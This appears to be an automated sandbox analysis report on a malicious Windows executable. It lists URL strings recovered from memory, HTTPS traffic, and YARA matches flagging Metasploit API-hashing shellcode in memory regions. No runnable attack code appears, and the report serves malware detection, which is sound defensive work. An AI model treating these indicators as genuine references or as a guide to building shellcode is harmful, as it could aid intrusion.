        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873753022.000001780ADB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
        Source: DChOtFdp9T.exe, 00000001.00000002.1874500664.000001780BAB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
        Source: DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
        Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
        Source: DChOtFdp9T.exe, 00000001.00000002.1873753022.000001780ADB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
        Source: DChOtFdp9T.exe, 00000000.00000003.1683854693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684004628.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684211779.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684440331.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684554288.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1693678108.00000260D1CE2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696125909.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683395424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1693678108.00000260D1CDC000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1697440616.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684283969.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1703446111.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1703986094.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684364998.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683487752.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683712452.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696302683.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696738812.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696576885.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714923767.000001780A5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
        Source: DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yahoo.com/
        Source: DChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
        Source: _cffi_backend.cp312-win_amd64.pyd.0.drString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
        Source: DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cloud.google.com/appengine/docs/standard/runtimes
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://cryptography.io
        Source: METADATA.0.drString found in binary or memory: https://cryptography.io/
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://cryptography.io/en/latest/changelog/
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://cryptography.io/en/latest/installation/
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://cryptography.io/en/latest/security/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715097518.000001780A356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
        Source: DChOtFdp9T.exe, 00000001.00000003.1707557533.0000017809BC9000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707484539.0000017809BB7000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872392888.0000017809A8C000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707484539.0000017809BA7000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
        Source: DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780BA74000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B20E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
        Source: DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B13000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707814003.0000017809B41000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A616000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/openssl/openssl/blob/master/include/openssl/pem.h
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
        Source: METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/issues
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
        Source: DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
        Source: DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
        Source: DChOtFdp9T.exe, 00000001.00000002.1872660104.0000017809E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
        Source: DChOtFdp9T.exe, 00000001.00000002.1872392888.0000017809A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
        Source: DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
        Source: DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B13000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707814003.0000017809B41000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
        Source: DChOtFdp9T.exe, 00000001.00000003.1710316814.000001780A0E6000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715918699.000001780A0B7000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1710387124.000001780A08B000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A063000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1710245144.000001780A0DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
        Source: DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues/396
        Source: DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues/396p
        Source: DChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
        Source: DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B13000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707814003.0000017809B41000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
        Source: DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/497
        Source: DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B6D000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
        Source: DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780BA50000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
        Source: DChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
        Source: DChOtFdp9T.exe, 00000001.00000003.1715097518.000001780A356000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
        Source: DChOtFdp9T.exe, 00000001.00000002.1872730547.000001780A0FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
        Source: DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
        Source: DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
        Source: DChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A0FD000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715054087.000001780A108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.000001780A0FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
        Source: DChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
        Source: DChOtFdp9T.exe, 00000001.00000002.1872868299.000001780A150000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
        Source: DChOtFdp9T.exe, 00000001.00000002.1876269235.00007FFDFB5F0000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873602922.000001780AA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/build/).
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://pypi.org/project/cryptography/
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780B9B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
        Source: DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780B9B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.ioe
        Source: DChOtFdp9T.exe, 00000001.00000002.1873602922.000001780AA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
        Source: DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B6D000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
        Source: DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
        Source: DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warningsThe
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
        Source: DChOtFdp9T.exe, 00000000.00000003.1690343606.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drString found in binary or memory: https://www.apache.org/licenses/
        Source: DChOtFdp9T.exe, 00000000.00000003.1690343606.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1690343606.00000260D1CE3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1690447579.00000260D1CE4000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
        Source: DChOtFdp9T.exe, 00000000.00000003.1696302683.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1876005974.00007FFDFB1E4000.00000002.00000001.01000000.00000014.sdmp, DChOtFdp9T.exe, 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp, libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
        Source: DChOtFdp9T.exe, 00000001.00000002.1872730547.000001780A0FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
        Source: DChOtFdp9T.exe, 00000001.00000002.1876630072.00007FFDFB783000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/
        Source: DChOtFdp9T.exe, 00000001.00000002.1876269235.00007FFDFB5F0000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/)
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp, type: DROPPEDMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp, type: DROPPEDMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B59CC0_2_00007FF6029B59CC
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B4A800_2_00007FF6029B4A80
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029910000_2_00007FF602991000
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029AF6540_2_00007FF6029AF654
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029AD3F00_2_00007FF6029AD3F0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A0BC00_2_00007FF6029A0BC0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF60299935B0_2_00007FF60299935B
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A8D200_2_00007FF6029A8D20
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602999D2D0_2_00007FF602999D2D
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029994FB0_2_00007FF6029994FB
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B4CFC0_2_00007FF6029B4CFC
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B54800_2_00007FF6029B5480
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A1C800_2_00007FF6029A1C80
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A11D40_2_00007FF6029A11D4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A2A140_2_00007FF6029A2A14
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A09B40_2_00007FF6029A09B4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029AF6540_2_00007FF6029AF654
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B29900_2_00007FF6029B2990
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A0FD00_2_00007FF6029A0FD0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A6F5C0_2_00007FF6029A6F5C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A07B00_2_00007FF6029A07B0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B87880_2_00007FF6029B8788
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029AC8DC0_2_00007FF6029AC8DC
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029988800_2_00007FF602998880
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B05F40_2_00007FF6029B05F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A0DC40_2_00007FF6029A0DC4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B2E2C0_2_00007FF6029B2E2C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A26100_2_00007FF6029A2610
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A76140_2_00007FF6029A7614
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029ACD700_2_00007FF6029ACD70
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029A4D900_2_00007FF6029A4D90
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF6029B59CC1_2_00007FF6029B59CC
